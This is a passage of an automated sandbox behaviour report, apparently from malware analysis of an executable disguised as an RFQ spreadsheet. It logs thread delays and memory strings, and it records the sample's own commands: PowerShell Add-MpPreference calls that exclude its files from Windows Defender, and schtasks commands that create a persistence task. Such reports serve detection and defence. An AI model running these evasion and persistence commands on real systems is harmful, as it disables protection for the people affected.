                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196203Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1196094Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195984Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195875Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195766Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195656Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195547Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195438Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195313Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195188Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1195063Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194953Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194844Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194719Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194609Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194500Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194391Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeThread delayed: delay time: 1194281Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199874
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199764
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199656
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199546
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199250
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199125
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1199015
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198906
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198796
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198687
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198578
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198468
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198359
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198250
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198140
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1198031
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197921
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197812
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197703
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197593
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197484
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197373
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197265
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197156
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1197046
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196937
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196828
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196718
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196609
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196500
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196390
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196281
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196171
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1196060
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195951
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195843
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195734
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195624
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195515
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195406
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195296
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195187
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1195078
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194954
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194730
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194598
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194308
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194202
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1194093
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeThread delayed: delay time: 1193982
                      Source: ywKDUBCUA.exe, 00000010.00000002.3265209027.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlllf$
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2070955375.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000000.00000002.2064422472.0000000003BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: wHGfSH4OfX
                      Source: RFQ-101432620247fl#U00e2#U00aexslx.exe, 00000009.00000002.3266474447.0000000001629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmp9347.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeProcess created: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe "C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKDUBCUA" /XML "C:\Users\user\AppData\Local\Temp\tmpA374.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ywKDUBCUA.exeProcess created: C:\Users\user\AppData\Roaming\ywKDUBCUA.exe "C:\Users\user\AppData\Roaming\ywKDUBCUA.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ-101432620247fl#U00e2#U00aexslx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
